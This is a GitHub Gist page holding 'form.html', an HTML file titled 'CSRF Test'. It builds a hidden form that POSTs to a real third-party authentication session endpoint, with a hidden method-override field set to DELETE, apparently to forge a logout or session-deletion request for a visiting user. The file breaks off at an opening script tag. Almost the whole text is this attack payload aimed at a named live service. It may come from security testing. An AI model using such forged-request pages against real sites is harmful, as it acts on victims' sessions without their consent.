Skip to content

Instantly share code, notes, and snippets.

@Krigshaw
Krigshaw / form.html
Created May 18, 2025 16:13
form.html
<!DOCTYPE html>
<html>
<head>
<title>CSRF Test</title>
</head>
<body>
<form id="csrf-form" action="https://api.spacex.com/external-auth/v1/session" method="POST">
<input type="hidden" name="_method" value="DELETE">
</form>
<script>